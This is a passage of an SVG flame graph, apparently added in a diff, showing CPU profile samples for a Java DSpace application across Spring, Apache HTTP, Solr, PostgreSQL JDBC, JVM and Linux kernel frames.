+<title>Java_java_io_FileOutputStream_writeBytes (1 samples, 0.23%)</title><rect x="1155.1" y="373" width="2.7" height="15.0" fill="rgb(251,125,125)" rx="2" ry="2" />
+<text  x="1158.14" y="383.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="683.1" y="261" width="2.7" height="15.0" fill="rgb(207,61,61)" rx="2" ry="2" />
+<text  x="686.14" y="271.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$CharProperty:::match (2 samples, 0.45%)</title><rect x="978.1" y="85" width="5.4" height="15.0" fill="rgb(57,206,57)" rx="2" ry="2" />
+<text  x="981.14" y="95.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/logging/impl/WeakHashtable$Referenced:::&lt;init&gt; (1 samples, 0.23%)</title><rect x="873.5" y="341" width="2.7" height="15.0" fill="rgb(98,244,98)" rx="2" ry="2" />
+<text  x="876.55" y="351.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="170.9" y="421" width="5.4" height="15.0" fill="rgb(206,59,59)" rx="2" ry="2" />
+<text  x="173.91" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (17 samples, 3.86%)</title><rect x="146.8" y="693" width="45.6" height="15.0" fill="rgb(240,109,109)" rx="2" ry="2" />
+<text  x="149.77" y="703.5" >[lib..</text>
+</g>
+<g >
+<title>finish_task_switch (48 samples, 10.91%)</title><rect x="353.3" y="661" width="128.7" height="15.0" fill="rgb(205,57,57)" rx="2" ry="2" />
+<text  x="356.27" y="671.5" >finish_task_switch</text>
+</g>
+<g >
+<title>futex_wait (19 samples, 4.32%)</title><rect x="10.0" y="725" width="51.0" height="15.0" fill="rgb(247,119,119)" rx="2" ry="2" />
+<text  x="13.00" y="735.5" >futex..</text>
+</g>
+<g >
+<title>find_busiest_group (1 samples, 0.23%)</title><rect x="128.0" y="613" width="2.7" height="15.0" fill="rgb(251,125,125)" rx="2" ry="2" />
+<text  x="131.00" y="623.5" ></text>
+</g>
+<g >
+<title>sk_wait_data (19 samples, 4.32%)</title><rect x="487.4" y="693" width="50.9" height="15.0" fill="rgb(209,63,63)" rx="2" ry="2" />
+<text  x="490.36" y="703.5" >sk_wa..</text>
+</g>
+<g >
+<title>all (440 samples, 100%)</title><rect x="10.0" y="837" width="1180.0" height="15.0" fill="rgb(200,50,50)" rx="2" ry="2" />
+<text  x="13.00" y="847.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (16 samples, 3.64%)</title><rect x="146.8" y="661" width="42.9" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="149.77" y="671.5" >[lib..</text>
+</g>
+<g >
+<title>do_mprotect_pkey (1 samples, 0.23%)</title><rect x="350.6" y="661" width="2.7" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="353.59" y="671.5" ></text>
+</g>
+<g >
+<title>java/lang/reflect/Proxy:::newProxyInstance (1 samples, 0.23%)</title><rect x="758.2" y="389" width="2.7" height="15.0" fill="rgb(86,233,86)" rx="2" ry="2" />
+<text  x="761.23" y="399.5" ></text>
+</g>
+<g >
+<title>ret_from_intr (1 samples, 0.23%)</title><rect x="484.7" y="693" width="2.7" height="15.0" fill="rgb(222,82,82)" rx="2" ry="2" />
+<text  x="487.68" y="703.5" ></text>
+</g>
+<g >
+<title>ctx_sched_out (1 samples, 0.23%)</title><rect x="487.4" y="597" width="2.6" height="15.0" fill="rgb(216,74,74)" rx="2" ry="2" />
+<text  x="490.36" y="607.5" ></text>
+</g>
+<g >
+<title>irqtime_account_irq (1 samples, 0.23%)</title><rect x="597.3" y="517" width="2.7" height="15.0" fill="rgb(215,72,72)" rx="2" ry="2" />
+<text  x="600.32" y="527.5" ></text>
+</g>
+<g >
+<title>swapgs_restore_regs_and_return_to_usermode (4 samples, 0.91%)</title><rect x="176.3" y="597" width="10.7" height="15.0" fill="rgb(201,52,52)" rx="2" ry="2" />
+<text  x="179.27" y="607.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="1144.4" y="149" width="2.7" height="15.0" fill="rgb(205,57,57)" rx="2" ry="2" />
+<text  x="1147.41" y="159.5" ></text>
+</g>
+<g >
+<title>schedule (8 samples, 1.82%)</title><rect x="219.2" y="693" width="21.4" height="15.0" fill="rgb(203,54,54)" rx="2" ry="2" />
+<text  x="222.18" y="703.5" >s..</text>
+</g>
+<g >
+<title>sk_stream_alloc_skb (1 samples, 0.23%)</title><rect x="659.0" y="677" width="2.7" height="15.0" fill="rgb(227,90,90)" rx="2" ry="2" />
+<text  x="662.00" y="687.5" ></text>
+</g>
+<g >
+<title>Interpreter (189 samples, 42.95%)</title><rect x="667.0" y="517" width="506.9" height="15.0" fill="rgb(213,69,69)" rx="2" ry="2" />
+<text  x="670.05" y="527.5" >Interpreter</text>
+</g>
+<g >
+<title>sun/util/calendar/Gregorian:::getCalendarDate (1 samples, 0.23%)</title><rect x="667.0" y="405" width="2.7" height="15.0" fill="rgb(55,205,55)" rx="2" ry="2" />
+<text  x="670.05" y="415.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="216.5" y="709" width="2.7" height="15.0" fill="rgb(201,52,52)" rx="2" ry="2" />
+<text  x="219.50" y="719.5" ></text>
+</g>
+<g >
+<title>JVM_InvokeMethod (189 samples, 42.95%)</title><rect x="667.0" y="613" width="506.9" height="15.0" fill="rgb(221,81,81)" rx="2" ry="2" />
+<text  x="670.05" y="623.5" >JVM_InvokeMethod</text>
+</g>
+<g >
+<title>[libnet.so] (1 samples, 0.23%)</title><rect x="951.3" y="277" width="2.7" height="15.0" fill="rgb(209,63,63)" rx="2" ry="2" />
+<text  x="954.32" y="287.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (48 samples, 10.91%)</title><rect x="353.3" y="773" width="128.7" height="15.0" fill="rgb(219,78,78)" rx="2" ry="2" />
+<text  x="356.27" y="783.5" >entry_SYSCALL_64</text>
+</g>
+<g >
+<title>org/springframework/core/convert/support/GenericConversionService:::addConverter (2 samples, 0.45%)</title><rect x="852.1" y="373" width="5.4" height="15.0" fill="rgb(92,238,92)" rx="2" ry="2" />
+<text  x="855.09" y="383.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="61.0" y="725" width="2.6" height="15.0" fill="rgb(238,105,105)" rx="2" ry="2" />
+<text  x="63.95" y="735.5" ></text>
+</g>
+<g >
+<title>update_process_times (1 samples, 0.23%)</title><rect x="755.5" y="293" width="2.7" height="15.0" fill="rgb(221,80,80)" rx="2" ry="2" />
+<text  x="758.55" y="303.5" ></text>
+</g>
+<g >
+<title>org/apache/http/message/AbstractHttpMessage:::headerIterator (1 samples, 0.23%)</title><rect x="1125.6" y="373" width="2.7" height="15.0" fill="rgb(93,239,93)" rx="2" ry="2" />
+<text  x="1128.64" y="383.5" ></text>
+</g>
+<g >
+<title>futex_wait (1 samples, 0.23%)</title><rect x="192.4" y="725" width="2.6" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="195.36" y="735.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Bundle:::getName (1 samples, 0.23%)</title><rect x="905.7" y="453" width="2.7" height="15.0" fill="rgb(68,217,68)" rx="2" ry="2" />
+<text  x="908.73" y="463.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/AbstractSessionOutputBuffer:::write (2 samples, 0.45%)</title><rect x="774.3" y="293" width="5.4" height="15.0" fill="rgb(109,254,109)" rx="2" ry="2" />
+<text  x="777.32" y="303.5" ></text>
+</g>
+<g >
+<title>org/dspace/servicemanager/DSpaceServiceManager:::getServiceByName (1 samples, 0.23%)</title><rect x="967.4" y="453" width="2.7" height="15.0" fill="rgb(75,223,75)" rx="2" ry="2" />
+<text  x="970.41" y="463.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolablePreparedStatement:::close (1 samples, 0.23%)</title><rect x="1061.3" y="421" width="2.7" height="15.0" fill="rgb(74,222,74)" rx="2" ry="2" />
+<text  x="1064.27" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.23%)</title><rect x="798.5" y="389" width="2.6" height="15.0" fill="rgb(89,236,89)" rx="2" ry="2" />
+<text  x="801.45" y="399.5" ></text>
+</g>
+<g >
+<title>sun/reflect/DelegatingMethodAccessorImpl:::invoke (189 samples, 42.95%)</title><rect x="667.0" y="661" width="506.9" height="15.0" fill="rgb(86,233,86)" rx="2" ry="2" />
+<text  x="670.05" y="671.5" >sun/reflect/DelegatingMethodAccessorImpl:::invoke</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="173.6" y="181" width="2.7" height="15.0" fill="rgb(205,58,58)" rx="2" ry="2" />
+<text  x="176.59" y="191.5" ></text>
+</g>
+<g >
+<title>schedule_hrtimeout_range_clock (1 samples, 0.23%)</title><rect x="1101.5" y="229" width="2.7" height="15.0" fill="rgb(247,118,118)" rx="2" ry="2" />
+<text  x="1104.50" y="239.5" ></text>
+</g>
+<g >
+<title>nf_hook_slow (2 samples, 0.45%)</title><rect x="624.1" y="437" width="5.4" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="627.14" y="447.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (1 samples, 0.23%)</title><rect x="948.6" y="293" width="2.7" height="15.0" fill="rgb(94,241,94)" rx="2" ry="2" />
+<text  x="951.64" y="303.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (4 samples, 0.91%)</title><rect x="176.3" y="485" width="10.7" height="15.0" fill="rgb(207,61,61)" rx="2" ry="2" />
+<text  x="179.27" y="495.5" ></text>
+</g>
+<g >
+<title>__GI___libc_write (1 samples, 0.23%)</title><rect x="1155.1" y="341" width="2.7" height="15.0" fill="rgb(250,123,123)" rx="2" ry="2" />
+<text  x="1158.14" y="351.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolingDataSource$PoolGuardConnectionWrapper:::prepareStatement (2 samples, 0.45%)</title><rect x="911.1" y="405" width="5.4" height="15.0" fill="rgb(95,241,95)" rx="2" ry="2" />
+<text  x="914.09" y="415.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.68%)</title><rect x="345.2" y="757" width="8.1" height="15.0" fill="rgb(243,113,113)" rx="2" ry="2" />
+<text  x="348.23" y="767.5" ></text>
+</g>
+<g >
+<title>pollwake (2 samples, 0.45%)</title><rect x="610.7" y="325" width="5.4" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="613.73" y="335.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.23%)</title><rect x="935.2" y="373" width="2.7" height="15.0" fill="rgb(106,251,106)" rx="2" ry="2" />
+<text  x="938.23" y="383.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/lang/time/FastDateFormat:::getInstance (1 samples, 0.23%)</title><rect x="817.2" y="453" width="2.7" height="15.0" fill="rgb(69,217,69)" rx="2" ry="2" />
+<text  x="820.23" y="463.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="216.5" y="773" width="2.7" height="15.0" fill="rgb(210,65,65)" rx="2" ry="2" />
+<text  x="219.50" y="783.5" ></text>
+</g>
+<g >
+<title>_complete_monitor_locking_Java (1 samples, 0.23%)</title><rect x="243.3" y="629" width="2.7" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="246.32" y="639.5" ></text>
+</g>
+<g >
+<title>__ip_local_out (5 samples, 1.14%)</title><rect x="573.2" y="613" width="13.4" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="576.18" y="623.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::receiveResponseEntity (1 samples, 0.23%)</title><rect x="1096.1" y="341" width="2.7" height="15.0" fill="rgb(57,206,57)" rx="2" ry="2" />
+<text  x="1099.14" y="351.5" ></text>
+</g>
+<g >
+<title>tcp_rack_update_reo_wnd (1 samples, 0.23%)</title><rect x="621.5" y="357" width="2.6" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="624.45" y="367.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::tryExecute (2 samples, 0.45%)</title><rect x="688.5" y="389" width="5.4" height="15.0" fill="rgb(108,253,108)" rx="2" ry="2" />
+<text  x="691.50" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/logging/LogFactory:::getFactory (5 samples, 1.14%)</title><rect x="836.0" y="373" width="13.4" height="15.0" fill="rgb(50,200,50)" rx="2" ry="2" />
+<text  x="839.00" y="383.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="782.4" y="261" width="2.6" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="785.36" y="271.5" ></text>
+</g>
+<g >
+<title>ip_local_deliver (10 samples, 2.27%)</title><rect x="602.7" y="453" width="26.8" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="605.68" y="463.5" >i..</text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRowIterator:::close (1 samples, 0.23%)</title><rect x="943.3" y="373" width="2.7" height="15.0" fill="rgb(54,204,54)" rx="2" ry="2" />
+<text  x="946.27" y="383.5" ></text>
+</g>
+<g >
+<title>jshort_disjoint_arraycopy (1 samples, 0.23%)</title><rect x="811.9" y="437" width="2.6" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="814.86" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::createMethod (22 samples, 5.00%)</title><rect x="696.5" y="421" width="59.0" height="15.0" fill="rgb(95,241,95)" rx="2" ry="2" />
+<text  x="699.55" y="431.5" >org/ap..</text>
+</g>
+<g >
+<title>dev_hard_start_xmit (2 samples, 0.45%)</title><rect x="586.6" y="565" width="5.4" height="15.0" fill="rgb(251,124,124)" rx="2" ry="2" />
+<text  x="589.59" y="575.5" ></text>
+</g>
+<g >
+<title>[unknown] (8 samples, 1.82%)</title><rect x="219.2" y="805" width="21.4" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="222.18" y="815.5" >[..</text>
+</g>
+<g >
+<title>schedule (1 samples, 0.23%)</title><rect x="1101.5" y="213" width="2.7" height="15.0" fill="rgb(209,63,63)" rx="2" ry="2" />
+<text  x="1104.50" y="223.5" ></text>
+</g>
+<g >
+<title>tcp_v4_do_rcv (1 samples, 0.23%)</title><rect x="1128.3" y="85" width="2.7" height="15.0" fill="rgb(221,81,81)" rx="2" ry="2" />
+<text  x="1131.32" y="95.5" ></text>
+</g>
+<g >
+<title>[libjli.so] (189 samples, 42.95%)</title><rect x="667.0" y="789" width="506.9" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="670.05" y="799.5" >[libjli.so]</text>
+</g>
+<g >
+<title>java/net/AbstractPlainSocketImpl:::setOption (1 samples, 0.23%)</title><rect x="779.7" y="357" width="2.7" height="15.0" fill="rgb(99,245,99)" rx="2" ry="2" />
+<text  x="782.68" y="367.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="294.3" y="757" width="5.3" height="15.0" fill="rgb(249,122,122)" rx="2" ry="2" />
+<text  x="297.27" y="767.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.23%)</title><rect x="1128.3" y="277" width="2.7" height="15.0" fill="rgb(223,83,83)" rx="2" ry="2" />
+<text  x="1131.32" y="287.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendSync (1 samples, 0.23%)</title><rect x="951.3" y="325" width="2.7" height="15.0" fill="rgb(60,209,60)" rx="2" ry="2" />
+<text  x="954.32" y="335.5" ></text>
+</g>
+<g >
+<title>__vdso_gettimeofday (1 samples, 0.23%)</title><rect x="905.7" y="325" width="2.7" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="908.73" y="335.5" ></text>
+</g>
+<g >
+<title>[libnet.so] (1 samples, 0.23%)</title><rect x="779.7" y="309" width="2.7" height="15.0" fill="rgb(238,105,105)" rx="2" ry="2" />
+<text  x="782.68" y="319.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::findByUnique (1 samples, 0.23%)</title><rect x="932.5" y="389" width="2.7" height="15.0" fill="rgb(70,218,70)" rx="2" ry="2" />
+<text  x="935.55" y="399.5" ></text>
+</g>
+<g >
+<title>__schedule (4 samples, 0.91%)</title><rect x="130.7" y="677" width="10.7" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="133.68" y="687.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="1144.4" y="101" width="2.7" height="15.0" fill="rgb(223,84,84)" rx="2" ry="2" />
+<text  x="1147.41" y="111.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (2 samples, 0.45%)</title><rect x="937.9" y="437" width="5.4" height="15.0" fill="rgb(102,247,102)" rx="2" ry="2" />
+<text  x="940.91" y="447.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match (2 samples, 0.45%)</title><rect x="978.1" y="197" width="5.4" height="15.0" fill="rgb(51,201,51)" rx="2" ry="2" />
+<text  x="981.14" y="207.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/AbstractMultipartForm:::encode (1 samples, 0.23%)</title><rect x="688.5" y="309" width="2.7" height="15.0" fill="rgb(75,223,75)" rx="2" ry="2" />
+<text  x="691.50" y="319.5" ></text>
+</g>
+<g >
+<title>native_write_msr (48 samples, 10.91%)</title><rect x="353.3" y="613" width="128.7" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="356.27" y="623.5" >native_write_msr</text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/DefaultSingletonBeanRegistry:::getSingletonNames (1 samples, 0.23%)</title><rect x="1042.5" y="389" width="2.7" height="15.0" fill="rgb(55,205,55)" rx="2" ry="2" />
+<text  x="1045.50" y="399.5" ></text>
+</g>
+<g >
+<title>apic_timer_interrupt (1 samples, 0.23%)</title><rect x="755.5" y="373" width="2.7" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="758.55" y="383.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="173.6" y="229" width="2.7" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="176.59" y="239.5" ></text>
+</g>
+<g >
+<title>nvme_irq (1 samples, 0.23%)</title><rect x="484.7" y="613" width="2.7" height="15.0" fill="rgb(235,102,102)" rx="2" ry="2" />
+<text  x="487.68" y="623.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendOneQuery (1 samples, 0.23%)</title><rect x="937.9" y="325" width="2.7" height="15.0" fill="rgb(98,244,98)" rx="2" ry="2" />
+<text  x="940.91" y="335.5" ></text>
+</g>
+<g >
+<title>java/io/FileOutputStream:::write (1 samples, 0.23%)</title><rect x="1152.5" y="421" width="2.6" height="15.0" fill="rgb(72,220,72)" rx="2" ry="2" />
+<text  x="1155.45" y="431.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::clearParameters (1 samples, 0.23%)</title><rect x="943.3" y="325" width="2.7" height="15.0" fill="rgb(74,222,74)" rx="2" ry="2" />
+<text  x="946.27" y="335.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/WriterAppender:::subAppend (2 samples, 0.45%)</title><rect x="1155.1" y="421" width="5.4" height="15.0" fill="rgb(92,239,92)" rx="2" ry="2" />
+<text  x="1158.14" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/ClientParamsStack:::getParameter (1 samples, 0.23%)</title><rect x="766.3" y="357" width="2.7" height="15.0" fill="rgb(81,228,81)" rx="2" ry="2" />
+<text  x="769.27" y="367.5" ></text>
+</g>
+<g >
+<title>org/apache/http/message/AbstractHttpMessage:::setParams (1 samples, 0.23%)</title><rect x="693.9" y="389" width="2.6" height="15.0" fill="rgb(55,205,55)" rx="2" ry="2" />
+<text  x="696.86" y="399.5" ></text>
+</g>
+<g >
+<title>handle_edge_irq (1 samples, 0.23%)</title><rect x="484.7" y="661" width="2.7" height="15.0" fill="rgb(200,50,50)" rx="2" ry="2" />
+<text  x="487.68" y="671.5" ></text>
+</g>
+<g >
+<title>call_stub (1 samples, 0.23%)</title><rect x="1144.4" y="229" width="2.7" height="15.0" fill="rgb(231,96,96)" rx="2" ry="2" />
+<text  x="1147.41" y="239.5" ></text>
+</g>
+<g >
+<title>sun/misc/FloatingDecimal$BinaryToASCIIBuffer:::getChars (1 samples, 0.23%)</title><rect x="704.6" y="309" width="2.7" height="15.0" fill="rgb(87,234,87)" rx="2" ry="2" />
+<text  x="707.59" y="319.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="779.7" y="293" width="2.7" height="15.0" fill="rgb(209,64,64)" rx="2" ry="2" />
+<text  x="782.68" y="303.5" ></text>
+</g>
+<g >
+<title>VM_Periodic_Tas (20 samples, 4.55%)</title><rect x="246.0" y="821" width="53.6" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="249.00" y="831.5" >VM_Pe..</text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (16 samples, 3.64%)</title><rect x="248.7" y="629" width="42.9" height="15.0" fill="rgb(217,75,75)" rx="2" ry="2" />
+<text  x="251.68" y="639.5" >__in..</text>
+</g>
+<g >
+<title>resolve_opt_virtual_call (1 samples, 0.23%)</title><rect x="1171.2" y="341" width="2.7" height="15.0" fill="rgb(254,129,129)" rx="2" ry="2" />
+<text  x="1174.23" y="351.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/Category:::info (3 samples, 0.68%)</title><rect x="1152.5" y="485" width="8.0" height="15.0" fill="rgb(97,243,97)" rx="2" ry="2" />
+<text  x="1155.45" y="495.5" ></text>
+</g>
+<g >
+<title>sock_sendmsg (39 samples, 8.86%)</title><rect x="559.8" y="725" width="104.6" height="15.0" fill="rgb(217,74,74)" rx="2" ry="2" />
+<text  x="562.77" y="735.5" >sock_sendmsg</text>
+</g>
+<g >
+<title>do_syscall_64 (1 samples, 0.23%)</title><rect x="1101.5" y="277" width="2.7" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="1104.50" y="287.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="1141.7" y="229" width="2.7" height="15.0" fill="rgb(226,88,88)" rx="2" ry="2" />
+<text  x="1144.73" y="239.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="667.0" y="389" width="2.7" height="15.0" fill="rgb(202,53,53)" rx="2" ry="2" />
+<text  x="670.05" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.45%)</title><rect x="948.6" y="405" width="5.4" height="15.0" fill="rgb(100,246,100)" rx="2" ry="2" />
+<text  x="951.64" y="415.5" ></text>
+</g>
+<g >
+<title>flush_tlb_mm_range (1 samples, 0.23%)</title><rect x="350.6" y="613" width="2.7" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="353.59" y="623.5" ></text>
+</g>
+<g >
+<title>java/lang/StringCoding:::decode (1 samples, 0.23%)</title><rect x="919.1" y="405" width="2.7" height="15.0" fill="rgb(104,250,104)" rx="2" ry="2" />
+<text  x="922.14" y="415.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (19 samples, 4.32%)</title><rect x="141.4" y="725" width="51.0" height="15.0" fill="rgb(238,105,105)" rx="2" ry="2" />
+<text  x="144.41" y="735.5" >[libj..</text>
+</g>
+<g >
+<title>native_write_msr (12 samples, 2.73%)</title><rect x="310.4" y="613" width="32.1" height="15.0" fill="rgb(213,69,69)" rx="2" ry="2" />
+<text  x="313.36" y="623.5" >na..</text>
+</g>
+<g >
+<title>change_protection (1 samples, 0.23%)</title><rect x="350.6" y="629" width="2.7" height="15.0" fill="rgb(211,67,67)" rx="2" ry="2" />
+<text  x="353.59" y="639.5" ></text>
+</g>
+<g >
+<title>VM_Thread (20 samples, 4.55%)</title><rect x="299.6" y="821" width="53.7" height="15.0" fill="rgb(254,128,128)" rx="2" ry="2" />
+<text  x="302.64" y="831.5" >VM_Th..</text>
+</g>
+<g >
+<title>start_thread (2 samples, 0.45%)</title><rect x="294.3" y="805" width="5.3" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="297.27" y="815.5" ></text>
+</g>
+<g >
+<title>handle_irq_event (1 samples, 0.23%)</title><rect x="484.7" y="645" width="2.7" height="15.0" fill="rgb(210,65,65)" rx="2" ry="2" />
+<text  x="487.68" y="655.5" ></text>
+</g>
+<g >
+<title>sock_def_readable (3 samples, 0.68%)</title><rect x="608.0" y="373" width="8.1" height="15.0" fill="rgb(254,128,128)" rx="2" ry="2" />
+<text  x="611.05" y="383.5" ></text>
+</g>
+<g >
+<title>tick_sched_timer (1 samples, 0.23%)</title><rect x="701.9" y="277" width="2.7" height="15.0" fill="rgb(231,96,96)" rx="2" ry="2" />
+<text  x="704.91" y="287.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (4 samples, 0.91%)</title><rect x="130.7" y="757" width="10.7" height="15.0" fill="rgb(245,116,116)" rx="2" ry="2" />
+<text  x="133.68" y="767.5" ></text>
+</g>
+<g >
+<title>__handle_irq_event_percpu (1 samples, 0.23%)</title><rect x="484.7" y="629" width="2.7" height="15.0" fill="rgb(248,120,120)" rx="2" ry="2" />
+<text  x="487.68" y="639.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="1171.2" y="229" width="2.7" height="15.0" fill="rgb(247,118,118)" rx="2" ry="2" />
+<text  x="1174.23" y="239.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match (2 samples, 0.45%)</title><rect x="978.1" y="277" width="5.4" height="15.0" fill="rgb(70,219,70)" rx="2" ry="2" />
+<text  x="981.14" y="287.5" ></text>
+</g>
+<g >
+<title>__sys_connect (1 samples, 0.23%)</title><rect x="1128.3" y="149" width="2.7" height="15.0" fill="rgb(205,58,58)" rx="2" ry="2" />
+<text  x="1131.32" y="159.5" ></text>
+</g>
+<g >
+<title>release_sock (1 samples, 0.23%)</title><rect x="1128.3" y="117" width="2.7" height="15.0" fill="rgb(243,113,113)" rx="2" ry="2" />
+<text  x="1131.32" y="127.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/AbstractSessionOutputBuffer:::write (1 samples, 0.23%)</title><rect x="1093.5" y="341" width="2.6" height="15.0" fill="rgb(74,222,74)" rx="2" ry="2" />
+<text  x="1096.45" y="351.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/AbstractHttpClient:::doExecute (9 samples, 2.05%)</title><rect x="1082.7" y="405" width="24.2" height="15.0" fill="rgb(81,228,81)" rx="2" ry="2" />
+<text  x="1085.73" y="415.5" >o..</text>
+</g>
+<g >
+<title>java/util/LinkedHashMap:::removeEldestEntry (1 samples, 0.23%)</title><rect x="833.3" y="357" width="2.7" height="15.0" fill="rgb(107,252,107)" rx="2" ry="2" />
+<text  x="836.32" y="367.5" ></text>
+</g>
+<g >
+<title>nft_do_chain_inet (1 samples, 0.23%)</title><rect x="626.8" y="421" width="2.7" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="629.82" y="431.5" ></text>
+</g>
+<g >
+<title>schedule_timeout (19 samples, 4.32%)</title><rect x="487.4" y="661" width="50.9" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="490.36" y="671.5" >sched..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="216.5" y="629" width="2.7" height="15.0" fill="rgb(218,76,76)" rx="2" ry="2" />
+<text  x="219.50" y="639.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (1 samples, 0.23%)</title><rect x="1168.5" y="357" width="2.7" height="15.0" fill="rgb(72,220,72)" rx="2" ry="2" />
+<text  x="1171.55" y="367.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="1144.4" y="85" width="2.7" height="15.0" fill="rgb(207,60,60)" rx="2" ry="2" />
+<text  x="1147.41" y="95.5" ></text>
+</g>
+<g >
+<title>tcp_recvmsg (21 samples, 4.77%)</title><rect x="484.7" y="709" width="56.3" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="487.68" y="719.5" >tcp_r..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="61.0" y="693" width="2.6" height="15.0" fill="rgb(205,58,58)" rx="2" ry="2" />
+<text  x="63.95" y="703.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.23%)</title><rect x="964.7" y="389" width="2.7" height="15.0" fill="rgb(102,247,102)" rx="2" ry="2" />
+<text  x="967.73" y="399.5" ></text>
+</g>
+<g >
